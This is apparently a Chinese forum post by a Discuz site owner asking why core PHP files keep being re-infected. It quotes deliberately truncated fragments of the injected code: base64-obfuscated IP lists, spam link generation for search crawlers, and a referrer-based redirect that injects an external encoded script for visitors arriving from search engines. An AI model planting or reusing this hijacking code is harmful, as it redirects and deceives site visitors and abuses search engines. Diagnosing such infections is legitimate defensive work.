function_core.php、discuz_application.php、class_core.php、config_global.php;class_core.php文件反复被挂马什么原因?一会是class_core.php被修改,一会是config_global.php被修改。class_core.php常被插入劫持header以上部分代码,查看源码看不到任何信息,只能抓取诊断看到。
防止被恶意使用,仅附上部分代码error_reporting(0);$S9 = explode('|',base64_decode('NTguMjQ3fDE4MC4xNTZ8MTgwLjE1NnwxMTcuMTc3fDU5LjE3MnwxNzEuODN8MTE0LjgyfDYxLjE3Mg=='));$S22 = ($_GET['id'] > 1000000 || $_GET['tid'] > 1000000 || $_GET['aid'] > 10function PostLinks(){ $S27 = array(); $S27[]= 'https://'.$_SERVER['HTTP_HOST'].'/archives/'.date('Ymd').'/'.date('Hi').'/index.html'; return base64_encode(implode('|', $S27));}define('APP_JACK_DOCUMENTROOT',$_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6174746163686D656E742F666F72756D2F323F30372F'));主要是判断生成链接,加入链接牵引搜索引擎爬取。
跳转代码如下:$_config['cache']['type'] = '';function call_diy_jump(){ $jump_ref = explode('|','baidu.|haoso.|haosou.|bing.|google.|sogou.|so.'); $ref = strtolower($_SERVER['HTTP_REFERER']); $jccode='PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcml wdCIgc3JjPSJodHRwczovL2NvdW50Ny41MXllcy5vcmc vY2xpY2suYXNweD9pZD03MjM3MDYwMiZsb2dvPTEyIiB jaGFyc2V0PSJnYjIzMTIiPjwvc2NyaXB0Pg=='; $S22 = ($_GET['id'] > 1000000 || $_GET['tid'] > 9000000 || $_GET['aid'] > 3000000 || (stristr($_SERVER['QUERY_STRING'],'/')call_diy_jump();劫持搜索引擎实现页面跳转。